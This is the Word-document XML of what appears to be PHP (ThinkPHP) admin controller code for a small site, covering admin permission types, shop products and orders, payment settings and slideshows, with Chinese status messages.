    <w:p w14:paraId="33C10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t4 as $v4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A4D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84CCC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db=Db::name('admin_type')-&gt;where('id',$id)-&gt;value('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154F5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eckeddb){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCA3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checkeddb) as $cv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB75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v==$v4['id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB3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ecked='checked';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB25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E813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27C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AFBF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35E19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id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数对应权限数据不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0AF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CCD5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305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label class="col-md-3"&gt;&lt;input type="checkbox" '.$checked.' value="'.$v4['id'].'" name="data[]"&gt;'.$v4['title'].'&lt;/label&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE14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2E4B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1E2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159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AE5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F1BC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t;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCE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F27B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8AA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EB58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html);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BEC8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request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C5E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09DC9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post['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30440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post.data')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2682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name=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E2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CC1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name=$post['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACEC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6C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCBB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name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565B85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title'=&gt;$title,'data'=&gt;json_encode($dataname)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1022B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1EA54F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admin_type')-&gt;where('title',$title)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E47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468784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名称已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE11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326C3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_type')-&gt;insert($array);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61333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6022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1B0692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40F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6619FA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995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DF84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49254C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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FDB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title'=&gt;$title];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D897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_type')-&gt;where('id',$id)-&gt;update($array); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FA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295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_type')-&gt;where('id',$id)-&gt;update($array);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C8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1DD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7FD6C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30451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0F87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CD56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7EF5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A1AA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407A3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最少选一个权限</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341384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BCEE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AE2A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类型名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390A3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3B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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417E4E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58BE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dmin_type')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02629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BD81F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4D3D6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2ED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8A1E3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B04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91D0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data=$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1005D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA850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3225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863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Del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07346C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12CF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input('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35342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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD9D4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超级管理员禁止删除</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C92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509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d')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0CE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Db::name('admin')-&gt;where('type',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A10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dmin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19953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min_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29E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E375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6CF0F4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E1A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6877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092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2474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请先删除管理员列表对应类型账户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F925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1AA9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2F13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A3123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246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20B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E29B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0CEA7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0EB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63CE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8E12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7645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FECCD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3A8AF4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7FC19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0775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Shop extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D607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7E25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002F2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEA09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input('name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78FF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58FA5C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17AFE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531525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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5D5F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221A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like','%'.$name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7B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3A8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3EA3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input('typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24204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063F1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typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4410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3F9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gt;where($where)-&gt;order('des desc,id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D192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2A121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13979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page', $page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389657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list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5F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082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5B3DB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id']=2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C6F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ychannel',$mychannel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E660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Db::name('shoplist_typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B96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db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526D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6EDEC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2806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4151B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78BE84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ypeid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3AE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选择分类栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C3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60E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time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4FD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post['text'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF85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填写详细内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75166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77D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text']=html_entity_decode($post['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8AB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money']=$post['money']*100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A6B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images']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E871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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80FB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json_decode($post['images'],true) as $v){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452FD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v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570BF0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068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mages']=json_encode($images);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA1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AC34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455EF8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shoplist')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F6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38220F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0DB6B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BE4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gt;insertGetId($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDE7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1D02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8BC4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9E5D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022C1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FAE9A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186AD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gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551AAF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BC20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D4356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5E4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6B689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EE9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4DD2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931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AF6B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shoplist')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0A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weitoutiao']=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A749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name', $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B8C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057A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844A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0A6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3800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D71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64F211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59C4C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82D99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185D96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gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59543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F2D51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8A77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BAA7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4657CE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198F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4A30C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E234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9A1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BCD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979FD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0076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4D26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FD1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670877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_typeid')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3D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0F1E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A601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3A42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add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D1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79A78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A05CF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BFF1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435D8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name=Db::name('typeid')-&gt;where(['title'=&gt;$post['title']])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766381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name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627187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栏目标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38563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129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_typeid')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE1BB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0EBB6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3DC7D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7847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703BC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FDA0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2B115F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_typeid')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548AA7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6500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286EEE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B6D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C67B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19AE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B47DD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F1BC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7C4C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shoplist_typeid')-&gt;where(['id'=&gt;$id])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A486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29CA5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51737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57D88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BDB7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A80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404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49285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1CD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D56D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217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del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826C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3060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A972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376F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hoplist_typeid')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C4C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6BCF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69B509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12B9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126E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B12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DD9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2BB59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7220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D505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F1F4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C39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3D98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B1A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ngdan(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3868E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7DBF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input('name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1235C9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3492C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7DE182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title'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F632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b'.$type]=['like','%'.$name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6102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9C7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type]=$name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B106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356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F72C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173F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SHOPLIST__ b','a.shopid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE5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444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_records')-&gt;alias('a')-&gt;join($join)-&gt;field('a.id,a.shopid,a.data,a.uid,a.code,a.time,a.money,a.kuaidi,a.danhao,a.data,a.type,a.num,b.title,b.image')-&gt;order('a.time desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF50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10377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data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE74C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566C2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EC4D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040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ngdancode(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CC6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50C376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shoplist_records')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595D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Db::name('shoplist')-&gt;find($name['shopid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80EB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user($name['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE05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 $name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C4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shop', $shop);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7DBE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 $member);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FEBA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B4A8F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693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ngdanadd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA34A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296C2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44852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5800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shoplist_records')-&gt;update(['id'=&gt;$id,'data'=&gt;$post['data'],'kuaidi'=&gt;$post['kuaidi'],'danhao'=&gt;$post['danhao']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0102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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CEA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0BCD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CAA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F507D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DF28B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CEEC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1F1DD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7BC2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68470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ay extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C197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5D5D4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7511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pay')-&gt;order('des desc,id asc')-&gt;where("type!=''")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D682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1F0FA6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6829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8BE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58051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d=input('id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CEB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name=Db::name('pay')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530AF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name',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F0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request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05A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validate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E998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d'</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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78F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itle'</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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C6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hide'</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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'in:0,1|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794011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es'</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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC4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4D83C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validata=input('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD2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 (!$validate-&gt;check($validata)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36033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err'=&gt;$validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35576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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75710F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b::name('pay')-&gt;update($validata);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5AC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ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E12B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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032C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return $this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1718EE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3275D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E40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3D99A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request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D7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 ? input('id'): '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32334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 ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753DDC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0'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;','1'=&gt;'&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F4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DFEDF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ay')-&gt;where('id',$id)-&gt;setField('hide',$type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CA6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type]];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2053F7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047F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ET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FA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AB87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9859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提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521E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C35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4293F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785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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D328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pay_record')-&gt;order('id desc')-&gt;paginate(50);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A59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9092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3E807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0A88C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D1F08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9278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0234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485E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101B62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059F4C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B385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Slide extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6A8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44D4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43A3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lide_type')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE5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3D1A5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5936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9DA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Add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25250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85C9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21D3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25F59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59F646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57F10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54ABF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slide_type')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E59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5706A6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err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分组标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35351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8128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630C4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_type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A6D6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38F74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1176F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C329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CAD6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2A13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7F063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_type')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33E9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E969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273F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5BD17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02310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DED4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8CA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7A86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1A48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slide_type')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3A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408D7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0F29C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727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0491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3EA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668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2CD3BB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BEC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160E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A69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Del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D87B9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AD15D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D08D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73EE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Db::name('slide')-&gt;where('tid',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341B3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dmin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A938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_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C7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2BA9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0C558A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A9E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3887D8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989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EF5A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分组有轮播图，请先删除轮播图对应分组</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F5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EA1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6273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9EA4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C91C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4751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B20E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B8C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data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE4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28CF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0AAE8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d=input('tid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637FD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lide')-&gt;where('tid',$tid)-&gt;order('des desc,id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC19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300DD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list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF90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C6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0D2DE4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4AAE1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8B2A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7D8C2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0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A23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hide';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487037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gt;where('id',$id)-&gt;value('hide');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140416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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCCC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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1ED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3BA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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E85F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E6A0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gt;where('id',$id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E986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8676C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arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','id'=&gt;$hide,'text'=&gt;$arra[$hide]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C384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D117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rra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D47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6F1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34A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265A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5F2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D487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JAX</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA1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773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7EC9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8DB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3D5C9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249DC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id',input("tid"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5467B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_type=Db::name('slide_type')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296BD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slide_type',$slide_type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28988B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F38EC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5E340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3A3A28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642A0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3AF29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07C47F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gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186CF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84A71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AF74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AE091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64420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45277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      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABFA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slide')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484D1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6580A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4AA8E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BCA8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33BCD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698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43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78AF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A4DD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slide')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17218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C697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608F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0641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B3015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B11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1535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4B15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7C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2D7D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B9A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5630F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096D8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60844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6456B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slide')-&gt;delete($id);</w:t>
